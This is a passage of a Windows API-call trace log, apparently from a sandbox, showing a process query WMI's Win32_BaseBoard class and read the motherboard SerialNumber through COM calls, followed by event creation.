out: ppTypeAttr=0x19eca0, pDummy=0x3ff905e4) returned 0x0 [0154.410] ITypeInfo:LocalReleaseTypeAttr (This=0x585934) returned 0x0 [0154.410] IUnknown:Release (This=0x585934) returned 0x1 [0154.411] CoGetContextToken (in: pToken=0x19e7f8 | out: pToken=0x19e7f8) returned 0x0 [0154.411] CoGetContextToken (in: pToken=0x19ec00 | out: pToken=0x19ec00) returned 0x0 [0154.411] IUnknown:Release (This=0x54e340) returned 0x2 [0154.788] CoGetContextToken (in: pToken=0x19eee0 | out: pToken=0x19eee0) returned 0x0 [0154.790] LoadRegTypeLib (in: rguid=0x65ab2198*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x19eec8*=0x0 | out: pptlib=0x19eec8*=0x513458) returned 0x0 [0154.792] ITypeLib:GetTypeInfoOfGuid (in: This=0x513458, GUID=0x54f514*(Data1=0xd2f68443, Data2=0x85dc, Data3=0x427e, Data4=([0]=0x91, [1]=0xd8, [2]=0x36, [3]=0x65, [4]=0x54, [5]=0xcc, [6]=0x75, [7]=0x4c)), ppTInfo=0x54f508 | out: ppTInfo=0x54f508*=0x585960) returned 0x0 [0154.792] IUnknown:Release (This=0x513458) returned 0x2 [0154.792] IUnknown:AddRef (This=0x585960) returned 0x2 [0154.793] DispGetIDsOfNames (in: ptinfo=0x585960, rgszNames=0x19ef50*="InstancesOf", cNames=0x1, rgdispid=0x19ef40 | out: rgdispid=0x19ef40*=5) returned 0x0 [0154.795] IUnknown:Release (This=0x585960) returned 0x1 [0154.798] IUnknown:AddRef (This=0x585960) returned 0x2 [0154.798] ITypeInfo:LocalInvoke (This=0x585960) returned 0x0 [0154.798] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0154.798] GetCurrentThreadId () returned 0x1184 [0154.798] WbemLocator:IUnknown:AddRef (This=0x5339c8) returned 0x3 [0154.799] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0154.799] GetCurrentThreadId () returned 0x1184 [0154.799] IWbemServices:CreateInstanceEnum (in: This=0x5339c8, strFilter="Win32_BaseBoard", lFlags=16, pCtx=0x0, ppEnum=0x19e73c | out: ppEnum=0x19e73c*=0x587440) returned 0x0 [0155.038] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x52d640 [0155.038] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x588450 [0155.039] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5886f0 [0155.039] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5808a0 [0155.039] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5718f0 [0155.039] IUnknown:QueryInterface (in: This=0x587440, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e4 | out: ppvObject=0x19e5e4*=0x587444) returned 0x0 [0155.039] IClientSecurity:QueryBlanket (in: This=0x587444, pProxy=0x587440, pAuthnSvc=0x19e5d0, pAuthzSvc=0x19e5d8, pServerPrincName=0x0, pAuthnLevel=0x19e60c, pImpLevel=0x19e610, pAuthInfo=0x0, pCapabilites=0x19e5d4 | out: pAuthnSvc=0x19e5d0*=0xa, pAuthzSvc=0x19e5d8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19e60c*=0x6, pImpLevel=0x19e610*=0x2, pAuthInfo=0x0, pCapabilites=0x19e5d4*=0x1) returned 0x0 [0155.039] IUnknown:Release (This=0x587444) returned 0x1 [0155.039] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0155.039] GetCurrentThreadId () returned 0x1184 [0155.039] WbemLocator:IUnknown:QueryInterface (in: This=0x5339c8, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x5472a4) returned 0x0 [0155.040] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5472a4, pProxy=0x5339c8, pAuthnSvc=0x19e5bc, pAuthzSvc=0x19e5c0, pServerPrincName=0x0, pAuthnLevel=0x19e5cc, pImpLevel=0x19e5d0, pAuthInfo=0x0, pCapabilites=0x19e5c4 | out: pAuthnSvc=0x19e5bc*=0xa, pAuthzSvc=0x19e5c0*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19e5cc*=0x6, pImpLevel=0x19e5d0*=0x3, pAuthInfo=0x0, pCapabilites=0x19e5c4*=0x20) returned 0x0 [0155.040] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x3 [0155.040] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0155.040] GetCurrentThreadId () returned 0x1184 [0155.040] WbemLocator:IUnknown:QueryInterface (in: This=0x5339c8, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x5472a4) returned 0x0 [0155.040] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5472a4, pProxy=0x5339c8, pAuthnSvc=0x19e5bc, pAuthzSvc=0x19e5c0, pServerPrincName=0x0, pAuthnLevel=0x19e5d0, pImpLevel=0x19e5cc, pAuthInfo=0x0, pCapabilites=0x19e5c4 | out: pAuthnSvc=0x19e5bc*=0xa, pAuthzSvc=0x19e5c0*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19e5d0*=0x6, pImpLevel=0x19e5cc*=0x3, pAuthInfo=0x0, pCapabilites=0x19e5c4*=0x20) returned 0x0 [0155.040] WbemLocator:IUnknown:Release (This=0x5472a4) returned 0x3 [0155.040] IUnknown:QueryInterface (in: This=0x587440, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x587444) returned 0x0 [0155.066] IClientSecurity:CopyProxy (in: This=0x587444, pProxy=0x587440, ppCopy=0x19e608 | out: ppCopy=0x19e608*=0x546298) returned 0x0 [0155.066] IUnknown:QueryInterface (in: This=0x546298, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e55c | out: ppvObject=0x19e55c*=0x54629c) returned 0x0 [0155.066] IClientSecurity:QueryBlanket (in: This=0x54629c, pProxy=0x546298, pAuthnSvc=0x19e58c, pAuthzSvc=0x19e588, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x19e58c*=0xa, pAuthzSvc=0x19e588*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0155.066] IUnknown:Release (This=0x54629c) returned 0x3 [0155.067] IUnknown:QueryInterface (in: This=0x546298, riid=0x65ab1f08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e540 | out: ppvObject=0x19e540*=0x546bc8) returned 0x0 [0155.067] IUnknown:QueryInterface (in: This=0x546298, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x54629c) returned 0x0 [0155.067] IClientSecurity:SetBlanket (This=0x54629c, pProxy=0x546298, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0155.310] IUnknown:Release (This=0x54629c) returned 0x4 [0155.310] WbemLocator:IUnknown:Release (This=0x546bc8) returned 0x3 [0155.310] IUnknown:Release (This=0x587444) returned 0x2 [0155.310] IUnknown:AddRef (This=0x546298) returned 0x3 [0155.310] IUnknown:Release (This=0x587440) returned 0x2 [0155.310] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x19e6f8 | out: pperrinfo=0x19e6f8*=0x0) returned 0x1 [0155.311] WbemLocator:IUnknown:Release (This=0x5339c8) returned 0x2 [0155.311] IUnknown:Release (This=0x585960) returned 0x1 [0155.311] LoadRegTypeLib (in: rguid=0x65ab2198*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x19e724*=0x0 | out: pptlib=0x19e724*=0x513458) returned 0x0 [0155.313] ITypeLib:GetTypeInfoOfGuid (in: This=0x513458, GUID=0x52d678*(Data1=0x4b83d61, Data2=0x21ae, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x33, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0x52d660 | out: ppTInfo=0x52d660*=0x585a68) returned 0x0 [0155.313] IUnknown:Release (This=0x513458) returned 0x3 [0155.313] IUnknown:AddRef (This=0x585a68) returned 0x2 [0155.313] ITypeInfo:RemoteGetTypeAttr (in: This=0x585a68, ppTypeAttr=0x19e760, pDummy=0x3ff90ea4 | out: ppTypeAttr=0x19e760, pDummy=0x3ff90ea4) returned 0x0 [0155.314] ITypeInfo:LocalReleaseTypeAttr (This=0x585a68) returned 0x0 [0155.314] IUnknown:Release (This=0x585a68) returned 0x1 [0155.314] CoGetContextToken (in: pToken=0x19e2b8 | out: pToken=0x19e2b8) returned 0x0 [0155.314] CoGetContextToken (in: pToken=0x19e6c0 | out: pToken=0x19e6c0) returned 0x0 [0155.314] CoGetContextToken (in: pToken=0x19f2b0 | out: pToken=0x19f2b0) returned 0x0 [0155.314] CoGetContextToken (in: pToken=0x19f210 | out: pToken=0x19f210) returned 0x0 [0155.318] CoGetContextToken (in: pToken=0x19f228 | out: pToken=0x19f228) returned 0x0 [0155.319] LoadRegTypeLib (in: rguid=0x65ab2198*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x400, pptlib=0x19f218*=0x0 | out: pptlib=0x19f218*=0x513458) returned 0x0 [0155.320] ITypeLib:GetTypeInfoOfGuid (in: This=0x513458, GUID=0x52d668*(Data1=0x76a6415f, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), ppTInfo=0x52d65c | out: ppTInfo=0x52d65c*=0x585a10) returned 0x0 [0155.320] IUnknown:Release (This=0x513458) returned 0x4 [0155.320] IUnknown:AddRef (This=0x585a10) returned 0x2 [0155.320] ITypeInfo:LocalInvoke (This=0x585a10) returned 0x0 [0155.320] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0155.320] GetCurrentThreadId () returned 0x1184 [0155.321] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x57b660 [0155.321] IUnknown:Release (This=0x585a10) returned 0x1 [0155.321] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0155.811] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x52a4a8 [0155.821] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x52a970 [0156.089] CoGetContextToken (in: pToken=0x19ef60 | out: pToken=0x19ef60) returned 0x0 [0156.196] CoGetContextToken (in: pToken=0x19ea60 | out: pToken=0x19ea60) returned 0x0 [0156.196] IUnknown:AddRef (This=0x585a10) returned 0x2 [0156.196] ITypeInfo:LocalInvoke (This=0x585a10) returned 0x0 [0156.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.197] GetCurrentThreadId () returned 0x1184 [0156.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.197] GetCurrentThreadId () returned 0x1184 [0156.197] IUnknown:AddRef (This=0x546298) returned 0x3 [0156.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.197] GetCurrentThreadId () returned 0x1184 [0156.197] IEnumWbemClassObject:Clone (in: This=0x546298, ppEnum=0x19ea90 | out: ppEnum=0x19ea90*=0x57bc68) returned 0x0 [0156.368] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5881b0 [0156.368] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x588870 [0156.368] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x588bd0 [0156.368] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x580800 [0156.368] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5719a8 [0156.368] IUnknown:QueryInterface (in: This=0x57bc68, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e93c | out: ppvObject=0x19e93c*=0x57bc6c) returned 0x0 [0156.369] IClientSecurity:QueryBlanket (in: This=0x57bc6c, pProxy=0x57bc68, pAuthnSvc=0x19e928, pAuthzSvc=0x19e930, pServerPrincName=0x0, pAuthnLevel=0x19e964, pImpLevel=0x19e968, pAuthInfo=0x0, pCapabilites=0x19e92c | out: pAuthnSvc=0x19e928*=0xa, pAuthzSvc=0x19e930*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19e964*=0x6, pImpLevel=0x19e968*=0x2, pAuthInfo=0x0, pCapabilites=0x19e92c*=0x1) returned 0x0 [0156.369] IUnknown:Release (This=0x57bc6c) returned 0x1 [0156.371] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.371] GetCurrentThreadId () returned 0x1184 [0156.371] IUnknown:QueryInterface (in: This=0x546298, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e92c | out: ppvObject=0x19e92c*=0x54629c) returned 0x0 [0156.371] IClientSecurity:QueryBlanket (in: This=0x54629c, pProxy=0x546298, pAuthnSvc=0x19e914, pAuthzSvc=0x19e918, pServerPrincName=0x0, pAuthnLevel=0x19e924, pImpLevel=0x19e928, pAuthInfo=0x0, pCapabilites=0x19e91c | out: pAuthnSvc=0x19e914*=0xa, pAuthzSvc=0x19e918*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19e924*=0x6, pImpLevel=0x19e928*=0x3, pAuthInfo=0x0, pCapabilites=0x19e91c*=0x20) returned 0x0 [0156.372] IUnknown:Release (This=0x54629c) returned 0x3 [0156.372] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.372] GetCurrentThreadId () returned 0x1184 [0156.372] IUnknown:QueryInterface (in: This=0x546298, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e92c | out: ppvObject=0x19e92c*=0x54629c) returned 0x0 [0156.372] IClientSecurity:QueryBlanket (in: This=0x54629c, pProxy=0x546298, pAuthnSvc=0x19e914, pAuthzSvc=0x19e918, pServerPrincName=0x0, pAuthnLevel=0x19e928, pImpLevel=0x19e924, pAuthInfo=0x0, pCapabilites=0x19e91c | out: pAuthnSvc=0x19e914*=0xa, pAuthzSvc=0x19e918*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19e928*=0x6, pImpLevel=0x19e924*=0x3, pAuthInfo=0x0, pCapabilites=0x19e91c*=0x20) returned 0x0 [0156.372] IUnknown:Release (This=0x54629c) returned 0x3 [0156.372] IUnknown:QueryInterface (in: This=0x57bc68, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e95c | out: ppvObject=0x19e95c*=0x57bc6c) returned 0x0 [0156.372] IClientSecurity:CopyProxy (in: This=0x57bc6c, pProxy=0x57bc68, ppCopy=0x19e960 | out: ppCopy=0x19e960*=0x589718) returned 0x0 [0156.372] IUnknown:QueryInterface (in: This=0x589718, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e8b4 | out: ppvObject=0x19e8b4*=0x58971c) returned 0x0 [0156.373] IClientSecurity:QueryBlanket (in: This=0x58971c, pProxy=0x589718, pAuthnSvc=0x19e8e4, pAuthzSvc=0x19e8e0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x19e8e4*=0xa, pAuthzSvc=0x19e8e0*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0156.373] IUnknown:Release (This=0x58971c) returned 0x3 [0156.373] IUnknown:QueryInterface (in: This=0x589718, riid=0x65ab1f08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e898 | out: ppvObject=0x19e898*=0x5478c8) returned 0x0 [0156.373] IUnknown:QueryInterface (in: This=0x589718, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e89c | out: ppvObject=0x19e89c*=0x58971c) returned 0x0 [0156.373] IClientSecurity:SetBlanket (This=0x58971c, pProxy=0x589718, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0156.382] IUnknown:Release (This=0x58971c) returned 0x4 [0156.382] WbemLocator:IUnknown:Release (This=0x5478c8) returned 0x3 [0156.382] IUnknown:Release (This=0x57bc6c) returned 0x2 [0156.382] IUnknown:AddRef (This=0x589718) returned 0x3 [0156.382] IUnknown:Release (This=0x57bc68) returned 0x2 [0156.382] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x19ea50 | out: pperrinfo=0x19ea50*=0x0) returned 0x1 [0156.383] IUnknown:Release (This=0x546298) returned 0x2 [0156.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.383] GetCurrentThreadId () returned 0x1184 [0156.383] IUnknown:AddRef (This=0x589718) returned 0x3 [0156.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.383] GetCurrentThreadId () returned 0x1184 [0156.383] IEnumWbemClassObject:Reset (This=0x589718) returned 0x0 [0156.392] IUnknown:Release (This=0x589718) returned 0x2 [0156.392] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x57b840 [0156.392] IUnknown:Release (This=0x585a10) returned 0x1 [0156.422] CoGetContextToken (in: pToken=0x19e240 | out: pToken=0x19e240) returned 0x0 [0156.422] CoGetContextToken (in: pToken=0x19e648 | out: pToken=0x19e648) returned 0x0 [0156.483] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0156.483] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.483] GetCurrentThreadId () returned 0x1184 [0156.483] IUnknown:AddRef (This=0x589718) returned 0x3 [0156.484] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.484] GetCurrentThreadId () returned 0x1184 [0156.484] IEnumWbemClassObject:Next (in: This=0x589718, lTimeout=-1, uCount=0x1, apObjects=0x19f3bc, puReturned=0x19f39c | out: apObjects=0x19f3bc*=0x590b28, puReturned=0x19f39c*=0x1) returned 0x0 [0156.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x593f80 [0156.546] IUnknown:AddRef (This=0x590b28) returned 0x2 [0156.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5947b0 [0156.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x588570 [0156.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x588810 [0156.546] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x580940 [0156.546] WbemLocator:IUnknown:AddRef (This=0x5339c8) returned 0x3 [0156.546] IUnknown:AddRef (This=0x589718) returned 0x4 [0156.546] IUnknown:QueryInterface (in: This=0x589718, riid=0x65ab1f48*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f3e8 | out: ppvObject=0x19f3e8*=0x58971c) returned 0x0 [0156.547] IClientSecurity:QueryBlanket (in: This=0x58971c, pProxy=0x589718, pAuthnSvc=0x19f36c, pAuthzSvc=0x19f374, pServerPrincName=0x0, pAuthnLevel=0x19f398, pImpLevel=0x19f3a4, pAuthInfo=0x0, pCapabilites=0x19f368 | out: pAuthnSvc=0x19f36c*=0xa, pAuthzSvc=0x19f374*=0x0, pServerPrincName=0x0, pAuthnLevel=0x19f398*=0x6, pImpLevel=0x19f3a4*=0x3, pAuthInfo=0x0, pCapabilites=0x19f368*=0x20) returned 0x0 [0156.547] IUnknown:Release (This=0x58971c) returned 0x4 [0156.547] WbemLocator:IUnknown:Release (This=0x5339c8) returned 0x2 [0156.547] WbemLocator:IUnknown:AddRef (This=0x5339c8) returned 0x3 [0156.547] IUnknown:Release (This=0x589718) returned 0x3 [0156.547] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe [0156.547] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x587a08 [0156.547] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x5808c0 [0156.547] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x58a1a0 [0156.549] IUnknown:AddRef (This=0x590b28) returned 0x3 [0156.549] IUnknown:Release (This=0x590b28) returned 0x2 [0156.549] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x19f334 | out: pperrinfo=0x19f334*=0x0) returned 0x1 [0156.549] IUnknown:Release (This=0x589718) returned 0x2 [0156.550] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x19f3ec | out: pperrinfo=0x19f3ec*=0x0) returned 0x1 [0156.550] LoadRegTypeLib (in: rguid=0x65ab2198*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x19eb94*=0x0 | out: pptlib=0x19eb94*=0x513458) returned 0x0 [0156.552] ITypeLib:GetTypeInfoOfGuid (in: This=0x513458, GUID=0x65ab4c08*(Data1=0xd6bdafb2, Data2=0x9435, Data3=0x491f, Data4=([0]=0xbb, [1]=0x87, [2]=0x6a, [3]=0xa0, [4]=0xf0, [5]=0xbc, [6]=0x31, [7]=0xa2)), ppTInfo=0x587a24 | out: ppTInfo=0x587a24*=0x585a94) returned 0x0 [0156.552] IUnknown:Release (This=0x513458) returned 0x5 [0156.552] IUnknown:AddRef (This=0x585a94) returned 0x2 [0156.552] ITypeInfo:RemoteGetTypeAttr (in: This=0x585a94, ppTypeAttr=0x19ebd0, pDummy=0x3ff902d4 | out: ppTypeAttr=0x19ebd0, pDummy=0x3ff902d4) returned 0x0 [0156.553] ITypeInfo:LocalReleaseTypeAttr (This=0x585a94) returned 0x0 [0156.553] IUnknown:Release (This=0x585a94) returned 0x1 [0156.553] CoGetContextToken (in: pToken=0x19e728 | out: pToken=0x19e728) returned 0x0 [0156.554] CoGetContextToken (in: pToken=0x19eb30 | out: pToken=0x19eb30) returned 0x0 [0156.558] CoGetContextToken (in: pToken=0x19eef0 | out: pToken=0x19eef0) returned 0x0 [0156.558] LoadRegTypeLib (in: rguid=0x65ab2198*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x19eee8*=0x0 | out: pptlib=0x19eee8*=0x513458) returned 0x0 [0156.560] ITypeLib:GetTypeInfoOfGuid (in: This=0x513458, GUID=0x65ab1e68*(Data1=0x269ad56a, Data2=0x8a67, Data3=0x4129, Data4=([0]=0xbc, [1]=0x8c, [2]=0x5, [3]=0x6, [4]=0xdc, [5]=0xfe, [6]=0x98, [7]=0x80)), ppTInfo=0x587a20 | out: ppTInfo=0x587a20*=0x585ac0) returned 0x0 [0156.560] IUnknown:Release (This=0x513458) returned 0x6 [0156.560] IUnknown:AddRef (This=0x585ac0) returned 0x2 [0156.560] DispGetIDsOfNames (in: ptinfo=0x585ac0, rgszNames=0x19ef70*="SerialNumber", cNames=0x1, rgdispid=0x19ef60 | out: rgdispid=0x19ef60*=-1) returned 0x80020006 [0156.597] IUnknown:AddRef (This=0x590b28) returned 0x3 [0156.597] IWbemClassObject:Get (in: This=0x590b28, wszName="SerialNumber", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x19eeb8*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x19eeb8*=0) returned 0x0 [0156.597] IUnknown:Release (This=0x590b28) returned 0x2 [0156.597] SysStringLen (param_1="SerialNumber") returned 0xc [0156.597] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x589d68 [0156.597] SysStringLen (param_1="SerialNumber") returned 0xc [0156.597] IUnknown:Release (This=0x585ac0) returned 0x1 [0156.597] IUnknown:AddRef (This=0x585ac0) returned 0x2 [0156.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.597] GetCurrentThreadId () returned 0x1184 [0156.597] SysStringLen (param_1="SerialNumber") returned 0xc [0156.597] IWbemClassObject:Get (in: This=0x590b28, wszName="SerialNumber", lFlags=0, pVal=0x19ece8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ece0*=1699140, plFlavor=0x0 | out: pVal=0x19ece8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="..XXXXXXXXXXXXX.", varVal2=0x0), pType=0x19ece0*=8, plFlavor=0x0) returned 0x0 [0156.598] IUnknown:Release (This=0x585ac0) returned 0x1 [0156.599] SysStringByteLen (bstr="..XXXXXXXXXXXXX.") returned 0x20 [0156.599] SysStringByteLen (bstr="..XXXXXXXXXXXXX.") returned 0x20 [0156.700] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0156.700] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.700] GetCurrentThreadId () returned 0x1184 [0156.700] IUnknown:AddRef (This=0x589718) returned 0x3 [0156.701] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0156.701] GetCurrentThreadId () returned 0x1184 [0156.701] IEnumWbemClassObject:Next (in: This=0x589718, lTimeout=-1, uCount=0x1, apObjects=0x19f3bc, puReturned=0x19f39c | out: apObjects=0x19f3bc*=0x0, puReturned=0x19f39c*=0x0) returned 0x1 [0156.708] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x19f334 | out: pperrinfo=0x19f334*=0x0) returned 0x1 [0156.709] IUnknown:Release (This=0x589718) returned 0x2 [0156.709] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x19f3ec | out: pperrinfo=0x19f3ec*=0x0) returned 0x1 [0157.027] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4 [0157.029] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b4 [0157.077] SetEvent (hEvent=0x3b4) returned 1 